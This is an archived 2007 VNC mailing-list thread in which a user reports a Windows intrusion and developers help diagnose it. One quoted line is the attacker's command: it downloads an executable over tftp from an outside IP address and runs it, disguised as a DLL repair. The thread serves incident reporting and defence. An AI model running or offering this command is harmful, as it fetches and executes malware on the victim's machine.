RE: intrusion?

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 454-5900

Eusebio,

>From what you've described, it sounds like the problem has nothing to do
with TightVNC or VNC, and that it's most likely to do with some
vulnerability in your apache setup.

I'd recommend that you run a full virus-scan of the system at this point,
since it's quite possible (and likely) that there are other bits of software
on the affected system that have been placed there by the attacker, and
which may still be able to provide them with remote access to it.

Cheers,

Wez @ RealVNC Ltd

> -----Original Message-----
> From: vnc...@li... 
> [mailto:vnc...@li...] On 
> Behalf Of Eusebio
> Sent: 13 April 2007 10:58
> To: Constantin Kaplinsky
> Cc: vnc...@li...
> Subject: Re: intrusion?
> 
> First of all, thanks for your interest and for your reply
>  
> I have been finding it out, and could see it in front of me, 
> in accion, several times
> 
> My conclusions are:
> That thing sends keyboard codes to open 'Start menu' and try 
> to open a cmd window to execute that tftp, download a prog 
> and execute it
> 
> Other times it opened 'task manager' kill some process and 
> open others (really fast, everything in one or 2 seconds, I 
> couldnt see anything)
> 
> I think that VNC is involved only because it was at the start 
> menu, like any other  frecuent used program in XP
> 
> So, first thing I did was to erase the 
> 'C:\WINDOWS\system32\tftp.exe' prog (a simple ftp), and I 
> could see the intrusion failing
> And since I closed tcp port 80 in my router (opened for my 
> apache server) I have never seen it again.
>  
> So, good news, I thing VNC is as vulnerable as any other prog 
> that accepts keyboard inputs and is used frecuently
>  
> Thanks and regards
> Eusebio
> 
> 
> On 4/13/07, Constantin Kaplinsky <co...@ti...> wrote: 
> 
> 	Hello,
> 	
> 	>>>>> Eusebio wrote:
> 	
> 	> My pc (xp pro sp2) is usually on and connected, and I 
> often use 
> 	> tight-vnc, everything OK till I found this (see image)
> 	>
> 	> Someone executed this code: %comspec% /c echo 
> Repairing user32.dll
> 	> echo Please wait... & tftp -i 64.79.213.12 
> <http://64.79.213.12> GET
> 	> jijrtyw.exe & start jijrtyw&
> 	>
> 	> as a server address in 'TightVNC Viewer', appears an 
> error message:
> 	> "Failed to get server address" 
> 	>
> 	> but a cmd.exe window was open and that code was executed
> 	
> 	I'm trying to investigate this issue, but I do not 
> understand yet how
> 	that could be possible.
> 	
> 	Do you have other VNC versions installed? Specifically, 
> could it be 
> 	possible that you run RealVNC's version 4.1.1?
> 	
> 	While searching the Internet, I was able to find a 
> number of reports
> 	similar to this one (even the IP address was the same 
> in many cases),
> 	but what was strange is that versions and distributions 
> of VNC software 
> 	were different in different reports - TightVNC, UltraVNC, VNC4.
> 	
> 	Another strange thing is that VNC viewer is involved, 
> while VNC server
> 	is needed to connect to the machine. Are both server and viewer
> 	vulnerable? -- I think that's not likely. Looks very strange... 
> 	
> 	--
> 	With Best Wishes,
> 	Constantin
> 	
> 
> 
> 